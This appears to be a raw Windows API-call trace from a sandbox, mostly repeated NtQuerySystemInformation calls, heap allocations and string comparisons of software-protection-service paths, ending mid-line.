[0231.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd630, Length=0x20, ResultLength=0x0) [0231.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd8f0, Length=0x50, ResultLength=0x0) [0231.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd870, Length=0x28, ResultLength=0x0) [0231.731] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0231.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd8f0, Length=0x50, ResultLength=0x0) [0231.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd8f0, Length=0x50, ResultLength=0x0) [0231.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd8f0, Length=0x50, ResultLength=0x0) [0231.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd820, Length=0x38, ResultLength=0x0) [0231.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd650, Length=0x28, ResultLength=0x0) [0231.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd650, Length=0x28, ResultLength=0x0) [0231.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd650, Length=0x28, ResultLength=0x0) [0231.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6c0, Length=0x28, ResultLength=0x0) [0231.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd820, Length=0x38, ResultLength=0x0) [0231.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd740, Length=0x28, ResultLength=0x0) [0231.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd740, Length=0x28, ResultLength=0x0) [0231.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd820, Length=0x38, ResultLength=0x0) [0231.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x20, ResultLength=0x0) [0231.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd620, Length=0x20, ResultLength=0x0) [0231.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd620, Length=0x20, ResultLength=0x0) [0231.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd620, Length=0x20, ResultLength=0x0) [0231.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd820, Length=0x38, ResultLength=0x0) [0231.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x20, ResultLength=0x0) [0231.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd630, Length=0x20, ResultLength=0x0) [0231.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd630, Length=0x20, ResultLength=0x0) [0231.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.741] GetProcessHeap () returned 0x2026c630000 [0231.741] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d659450 [0231.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.797] GetProcessHeap () returned 0x2026c630000 [0231.797] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d6593f0 [0231.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) Thread: id = 637 os_tid = 0x24c Thread: id = 638 os_tid = 0x114c [0208.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f7a0, Length=0x50, ResultLength=0x0) [0208.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f720, Length=0x28, ResultLength=0x0) [0208.944] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f7a0, Length=0x50, ResultLength=0x0) [0208.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f7a0, Length=0x50, ResultLength=0x0) [0208.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f7a0, Length=0x50, ResultLength=0x0) [0208.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f6d0, Length=0x38, ResultLength=0x0) [0208.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f500, Length=0x28, ResultLength=0x0) [0208.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f500, Length=0x28, ResultLength=0x0) [0208.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f500, Length=0x28, ResultLength=0x0) [0208.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f570, Length=0x28, ResultLength=0x0) [0208.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f6d0, Length=0x38, ResultLength=0x0) [0208.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f5f0, Length=0x28, ResultLength=0x0) [0208.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f5f0, Length=0x28, ResultLength=0x0) [0208.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f6d0, Length=0x38, ResultLength=0x0) [0208.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f550, Length=0x20, ResultLength=0x0) [0208.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4d0, Length=0x20, ResultLength=0x0) [0208.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4d0, Length=0x20, ResultLength=0x0) [0208.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4d0, Length=0x20, ResultLength=0x0) [0208.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f6d0, Length=0x38, ResultLength=0x0) [0208.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f550, Length=0x20, ResultLength=0x0) [0208.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4e0, Length=0x20, ResultLength=0x0) [0208.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4e0, Length=0x20, ResultLength=0x0) [0208.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f7a0, Length=0x50, ResultLength=0x0) [0208.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f720, Length=0x28, ResultLength=0x0) [0208.953] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f7a0, Length=0x50, ResultLength=0x0) [0208.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f7a0, Length=0x50, ResultLength=0x0) [0208.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f7a0, Length=0x50, ResultLength=0x0) [0208.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f6d0, Length=0x38, ResultLength=0x0) [0208.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f500, Length=0x28, ResultLength=0x0) [0208.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f500, Length=0x28, ResultLength=0x0) [0208.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f500, Length=0x28, ResultLength=0x0) [0208.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f570, Length=0x28, ResultLength=0x0) [0208.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f6d0, Length=0x38, ResultLength=0x0) [0208.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f5f0, Length=0x28, ResultLength=0x0) [0208.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f5f0, Length=0x28, ResultLength=0x0) [0208.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f6d0, Length=0x38, ResultLength=0x0) [0208.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f550, Length=0x20, ResultLength=0x0) [0208.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4d0, Length=0x20, ResultLength=0x0) [0208.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4d0, Length=0x20, ResultLength=0x0) [0208.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4d0, Length=0x20, ResultLength=0x0) [0208.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f6d0, Length=0x38, ResultLength=0x0) [0208.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f550, Length=0x20, ResultLength=0x0) [0208.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4e0, Length=0x20, ResultLength=0x0) [0208.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4e0, Length=0x20, ResultLength=0x0) [0208.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f7f0, Length=0x58, ResultLength=0x0) [0208.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f760, Length=0x28, ResultLength=0x0) [0208.961] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f7f0, Length=0x58, ResultLength=0x0) [0208.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f7f0, Length=0x58, ResultLength=0x0) [0208.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f7f0, Length=0x58, ResultLength=0x0) [0208.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f6d0, Length=0x38, ResultLength=0x0) [0208.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f510, Length=0x28, ResultLength=0x0) [0208.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f510, Length=0x28, ResultLength=0x0) [0208.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f510, Length=0x28, ResultLength=0x0) [0208.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f580, Length=0x28, ResultLength=0x0) [0208.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f6d0, Length=0x38, ResultLength=0x0) [0208.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f6d0, Length=0x38, ResultLength=0x0) [0208.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f600, Length=0x28, ResultLength=0x0) [0208.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.970] NtQuerySystemInformation (SystemInformationClass=0xb9, 